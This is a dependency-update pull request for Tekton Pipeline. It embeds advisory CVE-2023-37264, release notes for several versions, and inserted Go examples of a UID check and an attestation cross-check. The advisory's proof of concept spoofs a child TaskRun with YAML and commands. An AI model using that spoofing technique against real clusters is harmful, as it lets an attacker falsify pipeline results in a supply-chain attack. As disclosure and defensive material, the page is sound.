
chore(deps): update module github.com/tektoncd/pipeline to v0.52.1 [security] (release-v0.13) #627

Open. Wants to merge 1 commit into base: release-v0.13.

Conversation

redhat-renovate-bot (Collaborator) commented Feb 5, 2025

This PR contains the following updates:

| Package                      | Type    | Update | Change             |
|------------------------------|---------|--------|--------------------|
| github.com/tektoncd/pipeline | require | minor  | v0.40.2 -> v0.52.1 |

Pipelines do not validate child UIDs

CVE-2023-37264 / GHSA-w2h3-vvvq-3m53 / GO-2023-1901


Summary

Pipelines do not validate child UIDs, which means that a user that has access to create TaskRuns can create their own Tasks that the Pipelines controller will accept as the child Task.

We should add UID to PipelineRun status and validate that child Run status/results only come from Runs matching the same UID.

Details

While we store and validate the PipelineRun's (api version, kind, name, uid) in the child Run's OwnerReference, we only store (api version, kind, name) in the ChildStatusReference.

This means that if a client had access to create TaskRuns on a cluster, they could create a child TaskRun for a pipeline with the same name + owner reference, and the Pipeline controller picks it up as if it was the original TaskRun. This is problematic since it can let users modify the config of Pipelines at runtime, which violates SLSA L2 Service Generated / Non-falsifiable requirements.

I believe this is also true for TaskRuns -> Pods since it looks like we only lookup by name, though I haven't tested this.

If you have update permissions on tekton resources, you could also perform a similar bypass like this (because it's difficult to distinguish this from a Task retry). For now, I think relying on RBAC is fine and treat update as a privileged role (though we should perhaps update docs to stress this). Create is the most problematic for now. SPIFFE/SPIRE might be able to help with ensuring that only the controller can modify state long term (e.g. sign the expected UIDs?)
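The check described above, as an added Go illustration (this is not Tekton's code; the types are simplified stand-ins for PipelineRun, TaskRun, OwnerReference and ChildStatusReference, and the names, UIDs and result values are constructed). It places the pre-fix acceptance rule, which matches a child by name plus OwnerReference, beside the hardened rule that also requires the UID recorded when the controller created the child, and runs both against the advisory's scenario of a same-named TaskRun created by someone other than the controller:

```go
package main

import (
	"errors"
	"fmt"
)

// Simplified stand-ins for the Tekton objects named in the advisory; these are
// not Tekton's API types. Names, UIDs and results below are constructed.
type OwnerRef struct{ APIVersion, Kind, Name, UID string }

type TaskRun struct {
	Name, UID string
	OwnerRefs []OwnerRef
	Results   map[string]string
}

// ChildStatusReference: the pre-fix record held (apiVersion, kind, name) only;
// the hardened record also keeps the UID the controller saw when it created
// the child, which a same-named object created by someone else cannot share.
type ChildStatusReference struct {
	APIVersion, Kind, Name string
	UID                    string // "" in the pre-fix shape
}

type PipelineRun struct {
	APIVersion, Kind, Name, UID string
	Children                    []ChildStatusReference
}

var ErrUntrustedChild = errors.New("TaskRun does not match the recorded child reference")

// ownedBy checks the child's OwnerReference against the parent, UID included.
func ownedBy(tr TaskRun, pr PipelineRun) bool {
	for _, o := range tr.OwnerRefs {
		if o.APIVersion == pr.APIVersion && o.Kind == pr.Kind && o.Name == pr.Name && o.UID == pr.UID {
			return true
		}
	}
	return false
}

// acceptChildByName models the vulnerable check: a matching name plus a valid
// OwnerReference is enough, so any TaskRun carrying both is accepted.
func acceptChildByName(pr PipelineRun, ref ChildStatusReference, tr TaskRun) error {
	if tr.Name != ref.Name || !ownedBy(tr, pr) {
		return ErrUntrustedChild
	}
	return nil
}

// acceptChildByUID models the hardened check: the live object's UID must equal
// the UID recorded at creation; an empty recorded UID means "not created by the
// controller" and is rejected rather than trusted.
func acceptChildByUID(pr PipelineRun, ref ChildStatusReference, tr TaskRun) error {
	if err := acceptChildByName(pr, ref, tr); err != nil {
		return err
	}
	if ref.UID == "" || tr.UID != ref.UID {
		return ErrUntrustedChild
	}
	return nil
}

type acceptFunc func(PipelineRun, ChildStatusReference, TaskRun) error

// resolveResults collects "<child>.<result>" values from the live TaskRuns
// (keyed by name, which is unique within a namespace) using the given check.
func resolveResults(pr PipelineRun, live map[string]TaskRun, accept acceptFunc) (map[string]string, error) {
	out := map[string]string{}
	for _, ref := range pr.Children {
		tr, ok := live[ref.Name]
		if !ok {
			continue // child not created yet
		}
		if err := accept(pr, ref, tr); err != nil {
			return nil, fmt.Errorf("%s: %w", ref.Name, err)
		}
		for k, v := range tr.Results {
			out[ref.Name+"."+k] = v
		}
	}
	return out, nil
}

// scenario mirrors the advisory's PoC: the PipelineRun recorded hello-pr-task2
// with the UID of the object it created, but the object now living under that
// name has a different UID (and a correct OwnerReference).
func scenario() (PipelineRun, map[string]TaskRun) {
	pr := PipelineRun{APIVersion: "tekton.dev/v1beta1", Kind: "PipelineRun", Name: "hello-pr", UID: "pr-uid-1",
		Children: []ChildStatusReference{{APIVersion: "tekton.dev/v1beta1", Kind: "TaskRun", Name: "hello-pr-task2", UID: "tr-uid-controller"}}}
	owner := OwnerRef{APIVersion: pr.APIVersion, Kind: pr.Kind, Name: pr.Name, UID: pr.UID}
	injected := TaskRun{Name: "hello-pr-task2", UID: "tr-uid-other", OwnerRefs: []OwnerRef{owner},
		Results: map[string]string{"foo": "zxcv\n"}}
	return pr, map[string]TaskRun{injected.Name: injected}
}

func main() {
	pr, live := scenario()
	r, err := resolveResults(pr, live, acceptChildByName)
	fmt.Println("name-only check:", r, err) // the injected result is accepted
	r, err = resolveResults(pr, live, acceptChildByUID)
	fmt.Println("uid check:", r, err) // rejected with ErrUntrustedChild
}
```

The point of the empty-UID branch in `acceptChildByUID` is that a record written before the fix, or a child the controller never created, must not be silently trusted; the safe default is to refuse and let the reconciler report the mismatch.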

PoC
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
  name: hello-pr
spec:
  pipelineSpec:
    tasks:
      - name: task1
        taskSpec:
          steps:
            - name: echo
              image: distroless.dev/alpine-base
              script: |
                sleep 60
      - name: task2
        runAfter: [task1]
        taskSpec:
          steps:
            - name: echo
              image: distroless.dev/alpine-base
              script: |
                echo "asdf" > $(results.foo.path)
          results:
            - name: foo
    results:
      - name: foo
        value: $(tasks.task2.results.foo)

Once this is running, grab the PR UID:

$ k get pr hello-pr -o json | jq .metadata.uid -r

While pipeline is running task 1, start fake task 2:

apiVersion: tekton.dev/v1beta1
kind: TaskRun
metadata:
  annotations:
  labels:
    app.kubernetes.io/managed-by: tekton-pipelines
    tekton.dev/memberOf: tasks
    tekton.dev/pipeline: hello-pr
    tekton.dev/pipelineRun: hello-pr
    tekton.dev/pipelineTask: task2
  name: hello-pr-task2
  namespace: default
  ownerReferences:
  - apiVersion: tekton.dev/v1beta1
    blockOwnerDeletion: true
    controller: true
    kind: PipelineRun
    name: hello-pr
    uid: af549647-4532-468b-90c5-29122a408f8d  # <--- this should be the UID of the PipelineRun fetched in the previous step
spec:
  serviceAccountName: default
  taskSpec:
    results:
    - name: foo
      type: string
    steps:
    - image: distroless.dev/alpine-base
      name: echo
      resources: {}
      script: |
        echo "zxcv" > $(results.foo.path)

Get pipeline results - it shows the output of the 2nd injected TaskRun

$ k get pr -o json hello-pr | jq .status.pipelineResults
[
  {
    "name": "foo",
    "value": "zxcv\n"
  }
]
Impact

This can be used to trick the Pipeline controller into associating unrelated Runs to the Pipeline, feeding its data through the rest of the Pipeline. This requires access to create TaskRuns, so impact may vary depending on your Tekton setup. If users already have unrestricted access to create any Task/PipelineRun, this does not grant any additional capabilities.

Worst case example would be a supply chain attack where a malicious TaskRun triggered from Triggers/Workflows intercepts and replaces a task in a trusted Pipeline.

Severity

  • CVSS Score: 3.7 / 10 (Low)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Release Notes

tektoncd/pipeline (github.com/tektoncd/pipeline)

v0.52.1: Tekton Pipeline release v0.52.1 "California Spangled Optimus"

Compare Source

-Docs @​ v0.52.1
-Examples @​ v0.52.1

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.52.1/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77a97c22594268cc45d986246339ada304b7587b205b59cf5d59df2650d24b14825

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77a97c22594268cc45d986246339ada304b7587b205b59cf5d59df2650d24b14825
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.52.1/release.yaml
REKOR_UUID=24296fb24b8ad77a97c22594268cc45d986246339ada304b7587b205b59cf5d59df2650d24b14825

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.52.1@sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done
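The same verification in Go, as an added example (not part of Tekton's release tooling). It rebuilds the `name:tag@sha256:digest` references from an in-toto statement's subject list the way the jq filter above does, extracts the `image:` values from the release manifest, and then goes one step beyond the shell script by checking both directions: attested images missing from the manifest, and manifest images whose exact name and digest were never attested. The attestation, manifest, image names and digests are constructed sample data; only the tag v0.52.1 is taken from this release.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
)

// statement holds the only part of an in-toto Statement used here: the subjects.
type statement struct {
	Subject []struct {
		Name   string            `json:"name"`
		Digest map[string]string `json:"digest"`
	} `json:"subject"`
}

// attestedImages rebuilds "<name>:<tag>@sha256:<digest>" for every subject,
// which is what the release notes' jq filter produces.
func attestedImages(attestationJSON []byte, tag string) ([]string, error) {
	var st statement
	if err := json.Unmarshal(attestationJSON, &st); err != nil {
		return nil, err
	}
	var out []string
	for _, s := range st.Subject {
		d, ok := s.Digest["sha256"]
		if !ok || len(d) != 64 {
			return nil, fmt.Errorf("subject %q has no usable sha256 digest", s.Name)
		}
		out = append(out, fmt.Sprintf("%s:%s@sha256:%s", s.Name, tag, d))
	}
	return out, nil
}

// imageLine matches `image:` values in a Kubernetes manifest, with or without
// a leading list dash and with optional quotes.
var imageLine = regexp.MustCompile(`(?m)^[ \t]*(?:-[ \t]*)?image:[ \t]*["']?([^\s"']+)`)

// releaseImages extracts every image reference from the release manifest.
func releaseImages(releaseYAML string) []string {
	var out []string
	for _, m := range imageLine.FindAllStringSubmatch(releaseYAML, -1) {
		out = append(out, m[1])
	}
	return out
}

// crossCheck compares whole references exactly (the equivalent of grep -F on
// the full name@digest): attested images absent from the manifest, and
// manifest images that carry no attested digest.
func crossCheck(attested, inManifest []string) (missing, unattested []string) {
	att := map[string]bool{}
	for _, a := range attested {
		att[a] = true
	}
	man := map[string]bool{}
	for _, m := range inManifest {
		man[m] = true
	}
	for _, a := range attested {
		if !man[a] {
			missing = append(missing, a)
		}
	}
	for _, m := range inManifest {
		if !att[m] {
			unattested = append(unattested, m)
		}
	}
	return missing, unattested
}

// Constructed sample data: the tag is this release's, everything else is made up.
const sampleTag = "v0.52.1"

var (
	digestA = strings.Repeat("a", 64)
	digestB = strings.Repeat("b", 64)
	digestC = strings.Repeat("c", 64)
)

func sampleAttestation() []byte {
	return []byte(fmt.Sprintf(`{"_type":"https://in-toto.io/Statement/v0.1","subject":[
{"name":"gcr.io/example/pipeline/cmd/controller","digest":{"sha256":"%s"}},
{"name":"gcr.io/example/pipeline/cmd/webhook","digest":{"sha256":"%s"}}]}`, digestA, digestB))
}

// The webhook digest in the manifest deliberately differs from the attested one.
func sampleRelease() string {
	return fmt.Sprintf(`      containers:
      - name: tekton-pipelines-controller
        image: gcr.io/example/pipeline/cmd/controller:%[1]s@sha256:%[2]s
      - name: tekton-pipelines-webhook
        image: "gcr.io/example/pipeline/cmd/webhook:%[1]s@sha256:%[3]s"
`, sampleTag, digestA, digestC)
}

func main() {
	att, err := attestedImages(sampleAttestation(), sampleTag)
	if err != nil {
		panic(err)
	}
	missing, unattested := crossCheck(att, releaseImages(sampleRelease()))
	fmt.Println("attested but not in release file:", missing)
	fmt.Println("in release file but not attested:", unattested)
}
```

With a real release, `sampleAttestation()` would be replaced by the `rekor-cli get ... | jq -r .Attestation` output and `sampleRelease()` by the downloaded release.yaml; the reverse check is what catches an image that was swapped in the manifest without a matching entry in the attestation, which a one-directional grep never reports.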

Changes

Fixes
  • 🐛 [release-v0.52.x] Regression: fix results with out of order tasks (#​7174)

Fix regression where a different order of task definition may cause result resolution to break

Thanks

Thanks to these contributors who contributed to v0.52.1!

Extra shout-out for awesome release notes:

v0.52.0: Tekton Pipeline release v0.52.0 "California Spangled Optimus"

Compare Source

🎉 Task and Pipeline Resolver Metrics, API Specifications for pipelines-in-pipelines 🎉

-Docs @​ v0.52.0
-Examples @​ v0.52.0

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.52.0/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77aede6ff3c84da87cdeda75e9dcf779abc736bf5423b8a4151bad8193f0c76dd15

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77aede6ff3c84da87cdeda75e9dcf779abc736bf5423b8a4151bad8193f0c76dd15
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.52.0/release.yaml
REKOR_UUID=24296fb24b8ad77aede6ff3c84da87cdeda75e9dcf779abc736bf5423b8a4151bad8193f0c76dd15

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.52.0@sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Features

  • ✨ Add taskrun/pipelinerun gauge metrics around resolving respective tasks/pipelines (#​7094)

New gauge metrics are introduced that count the number of TaskRuns waiting for resolution of any Tasks they reference, as well as count the number of PipelineRuns waiting on Pipeline resolution, and lastly count the number of PipelineRuns waiting on Task resolution for their underlying TaskRuns.

  • ✨ [TEP-0056]: Initial set of API refactors pertinent to Pipelines in Pipelines (#​7055)

Added PipelineRef and PipelineSpec fields to PipelineTask, in lieu of TEP-0056

Fixes
  • 🐛 fix: clean results when taskrun retries (#​7126)

The taskrun will clean up the last task results before retrying.

  • 🐛 Validate beta features for inline pipelines and tasks (#​7079)

Bug fix: validate beta features in inline tasks/pipelines in the same way as referenced tasks/pipelines

  • 🐛 Remove results annotations filtering (#​7108)
  • 🐛 fix an issue with InvalidMatrixParameterTypes along with updating the matrix example with additional validations (#​7064)
Misc
  • 🔨 Add configmap for tracing config (#​6897)

Tracing endpoint configuration has moved from an environment variable to the config-tracing ConfigMap. Tracing can now be configured dynamically without restarting the controller. Refer to the example configuration provided as part of the ConfigMap for the configuration options and format.

  • 🔨 Clean up getting substitution expressions (#​7121)
  • 🔨 DEVELOPMENT: missing newline escape on shell example (#​7107)
  • 🔨 Cleanup: Move PipelineRun Reasons to pkg/apis (#​7102)
  • 🔨 cleaning up provenance from pipelineRun (#​7091)
  • 🔨 eventForObjectWithCondition -> EventForObjectWithCondition (#​7052)
  • 🔨 remove GetUnsignedPipeline helper function and use var in each file (#​6800)
  • 🔨 Bump github.com/containerd/containerd from 1.7.3 to 1.7.6 (#​7130)
  • 🔨 Bump github.com/spiffe/spire-api-sdk from 1.7.1 to 1.7.2 (#​7129)
  • 🔨 Bump k8s.io/apimachinery from 0.27.1 to 0.27.6 in /test/custom-task-ctrls/wait-task-beta (#​7119)
  • 🔨 Bump k8s.io/client-go from 0.27.1 to 0.27.6 in /test/custom-task-ctrls/wait-task-beta (#​7118)
  • 🔨 Bump k8s.io/api from 0.27.1 to 0.27.6 in /test/custom-task-ctrls/wait-task-beta (#​7117)
  • 🔨 Bump k8s.io/api from 0.26.7 to 0.26.9 in /test/custom-task-ctrls/wait-task-beta (#​7114)
  • 🔨 Bump k8s.io/client-go from 0.25.11 to 0.25.14 in /test/custom-task-ctrls/wait-task-beta (#​7112)
  • 🔨 Bump google.golang.org/grpc from 1.56.2 to 1.58.1 (#​7111)
  • 🔨 Bump github.com/jenkins-x/go-scm from 1.13.13 to 1.14.14 (#​7089)
  • 🔨 Bump github.com/sigstore/sigstore from 1.7.1 to 1.7.3 (#​7087)
  • 🔨 Bump github.com/tektoncd/pipeline from 0.49.0 to 0.51.0 in /test/custom-task-ctrls/wait-task-beta (#​7061)
  • 🔨 Bump google.golang.org/protobuf from 1.30.0 to 1.31.0 (#​6913)
Docs
  • 📖 add docs for emitting object results (#​7120)
  • 📖 fix docs and add max-result-size optional feature flag (#​7110)
  • 📖 Fix the link to alpha-features in docs (#​7075)

Thanks

Thanks to these contributors who contributed to v0.52.0!

Extra shout-out for awesome release notes:

v0.51.0: Tekton Pipeline release v0.51.0 "Havana Brown Demerzel"

Compare Source

🎉 Co-schedule option and bugfixes 🎉

-Docs @​ v0.51.0
-Examples @​ v0.51.0

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.51.0/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77af0123195ea84840480151ea9735ca9e2f869d262e403dad6fa6c42c32bc04193

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77af0123195ea84840480151ea9735ca9e2f869d262e403dad6fa6c42c32bc04193
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.51.0/release.yaml
REKOR_UUID=24296fb24b8ad77af0123195ea84840480151ea9735ca9e2f869d262e403dad6fa6c42c32bc04193

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.51.0@sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Upgrade Notices

With this release, the minimum Kubernetes version supported is now 1.25.

Changes

Features

  • ✨ [TEP-0135] Coschedule per (Isolated) PipelineRun e2e support (#​6927)

[TEP-0135]: Support the coschedule: pipelineruns and coschedule: isolate-pipelinerun coschedule modes.
Users can now opt in to this new feature to schedule all the pods in the same node and to optionally enforce one running pipelinerun per node at a time.

  • ✨ Add service for Resolvers - metrics, probes and tracing (#​6973)

Deprecation Notices

  • 🚨 Mark disable-affinity-assistant as deprecated (#​6991)

The disable-affinity-assistant feature flag is deprecated in favour of the new coschedule feature flag. The disable-affinity-assistant feature flag will be removed in 9 months.

Fixes
  • 🐛 Fix release pipeline (publish-to-bucket) (#​7044)

Binary file (standard input) matches

  • 🐛 Make sure we use the correct namespace for remote Pipeline validation (#​7017)

Fix validation errors when using the cluster resolver

  • 🐛 Create a separate role for Events Controller (#​7016)

The role for Events Controller is now tekton-events-controller, and the Rolebinding is now tekton-pipelines-events-controller.

  • 🐛 fix: add taskRunTemplate field validation (#​6983)

Validate forbidden envs in TaskRunTemplate.PodTemplate.

  • 🐛 Fail fast on invalid image (#​6982)

The Pod reason InvalidImageName is now treated as a permanent issue, so TaskRuns that include a step with an invalid image reference are failed immediately and the corresponding Pod is deleted.

  • 🐛 Sync checksum between trusted resources and cluster resolver (#​6964)

Cluster resolver now computes the checksum of the pre-processed Tekton object instead of just the spec.

  • 🐛 Fix Taskrun Failure for Preempted Pod of Taskrun (#​6962)

This fixes the Taskrun failure for Preempted Pod of Taskrun which uses PVC.

  • 🐛 fix: refine error resean with invalid pipelinename in taskrunspecs (#​6957)

When the taskRunSpecs of the pipelineRun contains an invalid pipeline task name, the cause of the InvalidTaskRunSpecs error is displayed.

  • 🐛 Fix enforce-nonfalsifiability feature flag in configmap (#​6937)
Misc
  • 🔨 Mark disable-affinity-assistant as deprecated (#​6991)

action required: The disable-affinity-assistant feature flag is deprecated in favour of the new coschedule feature flag. The disable-affinity-assistant feature flag will be removed in 9 months.
The Affinity Assistant behaviour should now be configured by the coschedule feature flag.

  • 🔨 Bump knative/pkg to 1.11 (#​6975)

Bump knative.dev/pkg to 1.11 so the Kubernetes min version is now 1.25

  • 🔨 Add webhook validation for remote Tasks (#​6942)

Remote tasks are now validated by any validating admission webhooks.

  • 🔨 [TEP-0135] Refactor CreatePVCsForWorkspaces (#​6921)
  • 🔨 Bump github.com/golangci/golangci-lint from 1.54.1 to 1.54.2 in /tools (#​7057)
  • 🔨 Bump github.com/golangci/golangci-lint from 1.54.0 to 1.54.1 in /tools (#​7047)
  • 🔨 Bump github.com/golangci/golangci-lint from 1.53.3 to 1.54.0 in /tools (#​7039)
  • 🔨 Bump github.com/hashicorp/golang-lru from 0.5.4 to 1.0.2 (#​7031)
  • 🔨 Bump github.com/cloudflare/circl from 1.1.0 to 1.3.3 (#​7026)
  • 🔨 Bump github.com/google/go-containerregistry from 0.15.2 to 0.16.1 (#​7021)
  • 🔨 Bump go.uber.org/zap from 1.24.0 to 1.25.0 (#​7018)
  • 🔨 Bump github.com/containerd/containerd from 1.6.19 to 1.7.3 (#​7002)
  • 🔨 Bump github.com/spiffe/spire-api-sdk from 1.7.0 to 1.7.1 (#​6997)
  • 🔨 Bump github.com/go-git/go-git/v5 from 5.6.1 to 5.8.1 (#​6980)
  • 🔨 Add E2E Testing for Matrix (#​6944)
Docs
  • 📖 docs: Update references to examples from v1beta1 to v1 (#​7050)
  • 📖 Fix typos and formatting in TaskRuns doc (#​7020)
  • 📖 Update Matrix Documentation for Results (#​7012)
  • 📖 [TEP-0135] Improve workspace related documentation (#​6994)
  • 📖 Remove warnings about matrix being non-functional (#​6986)
  • 📖 Add v0.50 to releases.md (#​6967)
  • 📖 [TEP-0135] Update Affinity Assistant documentation (#​6892)

Thanks

Thanks to these contributors who contributed to v0.51.0!

Extra shout-out for awesome release notes:

v0.50.6: Tekton Pipeline release v0.50.6 "Russian Blue Daneel Olivaw"

Compare Source

-Docs @​ v0.50.6
-Examples @​ v0.50.6

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.6/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77ab39f94a9c6627f1ae85c428863d0dbdbea4c9481976f30c00d5f9f712a117720

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77ab39f94a9c6627f1ae85c428863d0dbdbea4c9481976f30c00d5f9f712a117720
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.6/release.yaml
REKOR_UUID=24296fb24b8ad77ab39f94a9c6627f1ae85c428863d0dbdbea4c9481976f30c00d5f9f712a117720

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.50.6@sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Features

Fixes
  • 🐛 [release-v0.50.x] Remove conversion configuration for (#​7798)

Remove the conversion webhook configuration from the ClusterTask CRD; it doesn't need it.

  • 🐛 [release-v0.50.x] fix: ensure clustertask annotations are synced to taskrun (#​7656)

Fix: ensure ClusterTask annotations and labels are synced to TaskRun

  • 🐛 [release-v0.50.x] Fix validations for Sidecars to be consistent (#​7451)

Sidecars are now validated at the admission webhook

  • 🐛 [release-v0.50.x] don't return validation error when final tasks failed/skipped (#​7485)
Misc
Docs

Thanks

Thanks to these contributors who contributed to v0.50.6!

Extra shout-out for awesome release notes:

v0.50.5: Tekton Pipeline release v0.50.5 "Russian Blue Daneel Olivaw"

Compare Source

-Docs @​ v0.50.5
-Examples @​ v0.50.5

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.5/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77a6931938578b4916b2944efdb45cd531e1913f85b8bc9c0a4e73512edcfbb86b5

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77a6931938578b4916b2944efdb45cd531e1913f85b8bc9c0a4e73512edcfbb86b5
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.5/release.yaml
REKOR_UUID=24296fb24b8ad77a6931938578b4916b2944efdb45cd531e1913f85b8bc9c0a4e73512edcfbb86b5

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.50.5@sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Misc
  • 🔨 [release-v0.50.x] Fix the controller and webhook images to use stable alpine (#​7370)

The Tekton controller images are now based on a distroless base image which is built on top of Alpine 3.18

Thanks

Thanks to these contributors who contributed to v0.50.5!

Extra shout-out for awesome release notes:

v0.50.4: Tekton Pipeline release v0.50.4 "Russian Blue Daneel Olivaw"

Compare Source

-Docs @​ v0.50.4
-Examples @​ v0.50.4

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.4/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77a71dafca6c5f27aec2842996255eeda41ddd2b1cec5ca920da82d7239d7007e7a

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77a71dafca6c5f27aec2842996255eeda41ddd2b1cec5ca920da82d7239d7007e7a
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.4/release.yaml
REKOR_UUID=24296fb24b8ad77a71dafca6c5f27aec2842996255eeda41ddd2b1cec5ca920da82d7239d7007e7a

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.50.4@sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Misc
  • 🔨 [release-v0.50.x] Pin the distroless base image to a stable alpine (#​7362)

The Tekton images are now based on a distroless base image which is built on top of Alpine 3.18

Thanks

Thanks to these contributors who contributed to v0.50.4!

Extra shout-out for awesome release notes:

v0.50.3: Tekton Pipeline release v0.50.3 "Russian Blue Daneel Olivaw"

Compare Source

-Docs @​ v0.50.3
-Examples @​ v0.50.3

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.3/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77a8e347216bc80c82074f1721dbcfb1e10e487a0a2e5925d27cf46898c53bf6f5a

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77a8e347216bc80c82074f1721dbcfb1e10e487a0a2e5925d27cf46898c53bf6f5a
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.3/release.yaml
REKOR_UUID=24296fb24b8ad77a8e347216bc80c82074f1721dbcfb1e10e487a0a2e5925d27cf46898c53bf6f5a

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.50.3@sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Features

Fixes
  • [v0.50.x] Bump GRPC Go to 1.56.3 to fix CVE (#​7234)

This addresses GHSA-qppj-fm5r-hxr3 by not allowing more server handlers to be run than the HTTP/2 MAX_CONCURRENT_STREAMS setting.

Misc
Docs

Thanks

Thanks to these contributors who contributed to v0.50.3!

Extra shout-out for awesome release notes:

v0.50.2: Tekton Pipeline release v0.50.2 "Russian Blue Daneel Olivaw"

Compare Source

-Docs @​ v0.50.2
-Examples @​ v0.50.2

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.2/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77a6726958468f17410d57decea33a20cc1c61cae727201991da57f788c4095926b

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77a6726958468f17410d57decea33a20cc1c61cae727201991da57f788c4095926b
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.2/release.yaml
REKOR_UUID=24296fb24b8ad77a6726958468f17410d57decea33a20cc1c61cae727201991da57f788c4095926b

### Obtains the list of images with sha from the attestation
